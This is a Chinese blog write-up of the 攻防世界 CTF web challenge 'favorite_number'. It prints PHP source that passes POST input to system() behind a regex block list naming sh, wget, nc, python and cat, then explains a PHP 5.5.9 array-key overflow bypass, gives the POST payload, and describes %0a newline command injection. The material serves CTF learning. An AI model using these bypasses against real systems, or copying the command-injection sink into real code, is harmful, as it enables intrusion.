[攻防世界]favorite_number

最新推荐文章于 2022-10-11 17:34:23 发布
最新推荐文章于 2022-10-11 17:34:23 发布
阅读量361 收藏
点赞数
分类专栏: CTF 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/124638588
版权
本文介绍了如何利用PHP5.5.9中的数组键值溢出漏洞来绕过特定条件检查,以及如何在正则过滤下执行恶意命令。在给定的代码示例中,通过设置数组键为4294967296,可以重新索引数组以满足条件。同时,利用%0a进行命令注入,避开数字限制,以执行系统命令。
摘要由CSDN通过智能技术生成 
<?php
// php5.5.9
// 传参方式是post
$stuff = $_POST["stuff"];
// 白名单
$array = ['admin', 'user'];

// 既要数组强等于,又要首元素元素不等于
// 即要$stuff === ['admin', 'user'] 又要 $stuff[0]!='admin' 
if($stuff === $array && $stuff[0] != 'admin') {
    // 取得另一个post参数
    $num= $_POST["num"];

    // 正则匹配,要求全是数字 /i --- 忽略大小写 ,/m --- 多行匹配
    if (preg_match("/^\d+$/im",$num)){

        // 黑名单过滤
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            // 命令执行
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

关键要素:

php版本:5.5.9

通过post传两个值,一个$stuff,一个$num (num里的内容会被代码执行)

满足: 

  1. 既要数组强等于,又要首元素元素不等于。即要$stuff === ['admin', 'user'] 又要 $stuff[0]!='admin' 。
  2. 第二个参数要全是数字,且使用黑名单过滤了常用的命令

那么 怎么绕过呢。。。这好像是矛盾的东西,百思不得其解,看了下大佬的wp

第一个参数的绕过方法:利用php5.5版本的数组key值溢出漏洞。当php数组的数字索引的值过大时会导致数组的索引值被重新分配。如下代码所示:

具体的解释可以看这篇文章:php数组key溢出问题

$array = ['admin', 'user'];
$stuff[4294967296]='admin';
$stuff[]='user';

print_r($stuff);
echo "<br />";

var_dump($stuff === $array);

运行后

 

我试了一下 只有4294967296这个数字可以重新被索引,其他的不行,我不知道什么原理 

构造一下payload:stuff[4294967296]=admin&stuff[]=user&num=789

 页面显示了我们输入的数字

接下来就是绕过第二个参数的过滤了,即:绕过正则来执行恶意的命令。他只允许num是数字,而我们需要用代码来命令执行。这里用到  %0a

ls看根目录

 cat /flag给过滤了

这里

-i 是代表文件的id号 

 

 

snowlyzz
关注
专栏目录
【网络安全 | CTF】攻防世界wife_wife解题详析
等风来
07-23 5300
若isAdmin的属性是true,则它为管理员,否则为普通用户;于是我们可构造污染。该题涉及Java Script原型链污染。可以看到,后端编程语言为Node.js,
攻防世界 m0_01讲解
qq_53105813的博客
07-31 2408
思路总结
CTF攻防世界 favorite_number
weixin_68652890的博客
04-01 2599
1.首先接收一个数组stuff强等于array且stuff[0]不等于admin 2.正则表达多行匹配数字 3.过滤一些关键字 \d匹配数字 +一次或多次匹配 /i 表示匹配的时候不区分大小写 /m 表示多行匹配 所以就是多行匹配只能匹配到数字 (!preg_match("/sh|wget|nc|python|php|perl|?|flag|}|cat|echo|*|^|]|\\|’|"||/i",$num)) 过滤 PHP数组key溢出,简单的说就是stuff[4294967296]表示的值,与s.
攻防世界favorite_number
qq_46230755的博客
01-19 858
<?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|.
攻防世界-favorite_number-(详细操作)做题笔记
qq_43715020的博客
06-21 1061
攻防世界-favorite_number-(详细操作)做题笔记
攻防世界 favorite_number
CyhDl666的博客
02-21 233
favorite_number <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python|p
攻防世界-favorite_number
qq_44065556的博客
09-29 1575
老样子进入环境,一段代码刷刷下来,闯进脑子里 这里就需要具备php语言的基础了,还有正则的基础,还不会的小伙伴,赶紧补一补 (注意php5.5.9这个版本) 分析一下代码: if($stuff === $array && $stuff[0] != 'admin') //数组判断,强等于,首元素需要不等于 'admin' if (preg_match("/^\d+$/im",$num)) //只允纯数字, 看到谋面的/m了吧,这是开启了多行匹配,所以呢 ^和$不只是字...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
CTF笔记 攻防世界 favorite_number
qq_51248658的博客
10-11 578
php整型溢出,linux读取文件,正则绕过 向大佬学习
攻防世界----favorite_number
qq_44418229的博客
07-20 614
攻防世界----favorite_number 知识点1 php5.5.9版本数字溢出漏洞 知识点2 代码执行的绕过技巧
攻防世界 favorite_number web题 详解
xmj818719的博客
03-31 3874
首先进入页面 进入代码审计 首先数组强等于 又要满足第一个元素不等 其次正则,首先^\d+& 要求num完全为数字 i : ignore 执行大小写不敏感的匹配 m:multiple 多行模式 跨行检测 最后是常用命令的黑名单 首先准备第一个绕过 给了PHP版本5.5.9 存在key整数溢出漏洞当key=4294967296(2^32)可绕过检测 第一个条件的payload : stuff[4294967296]=admin&stuff[1]=user&a...
日常练习之web(攻防世界favorite_number
doraemon12345的博客
12-01 254
打开题目php代码映入眼帘,看到有提示版本,应该是版本漏洞 是个判断数组强等于,又要首元素不等,然后正则要求整个字符串都是数字 搜寻php5.5.9版本漏洞,有关php数组key溢出,看了大佬们的解释,有点明白,又有点不明白先放payload stuff[4294967296]=admin&stuff[1]=user&num=123 按照询问大佬的解释和网上查阅的资料,我的理解是计算机操作系统是32位的,那它最多的就是[2^31],这里的[4294967296=2 ^32 ]所以就会存在
攻防世界favorite_number】解题方法
weixin_43923736的博客
06-21 993
攻防世界favorite_number】解题方法
攻防世界WEB练习-favorite_number
墨鱼菜鸡
09-10 159
目录 题目场景 代码审计及绕过 通过php5.5版本的数组key溢出漏洞进行数组绕过 换行符绕过正则跨行匹配 黑名单绕过 题目场景 <?php //php5.5.9 $stuff=$_POST["stuff"]; $array=['admin','user']; if($stuff===$array&&amp...
攻防世界Guess the Number
qq_43605837的博客
07-21 483
2020.7.21-1 首先这道题 说实话,只是考验的代码能力 这道题的难点在于:拿到java后不知道怎么办 首先对于java程序,要进行反编译,可以利用插件,或者是DJ java discompiler. 将java进行反编译,在反编译之后,我们会得到一个原始代码 import java.io.PrintStream; import java.math.BigInteger; public class Gues { public Gues() { } static S
攻防世界-favorite number
xixihahawuwu的博客
11-23 1603
一道web题 题目并没有给我们有用的提示信息 进入环境 这个应该是网页的源码 开始代码审计 我们可以很明显的看到一个麻烦的东西 if($stuff === $array && $stuff[0] != ‘admin’) { 这里即要求一个强等于,还要求首元素要不一样 然后是一个正则,还有一个黑名单 第一个应该要从php5.5.9自身的漏洞入手,去查查资料 问题出在php中key数组的溢出 https://segmentfault.com/q/1010000003871264 这个链接是
攻防世界 Web高手进阶区 favorite_number
feng的博客
12-21 916
知识点 PHP的数组key溢出。 PHP的preg_match的/m绕过。 命令执行绕过。 WP 昨天偶然翻自己的收藏夹,突然翻到了攻防世界,差点忘了攻防世界的web还没刷完。。就回来稍微看了个题目,还是挺有意思的,不过我也没能完全独立做出来,前两个点都遇到了问题,反而是最后的命令执行做的比较轻松。 首先进入环境,审一下代码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $
攻防世界guess_num
最新发布
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值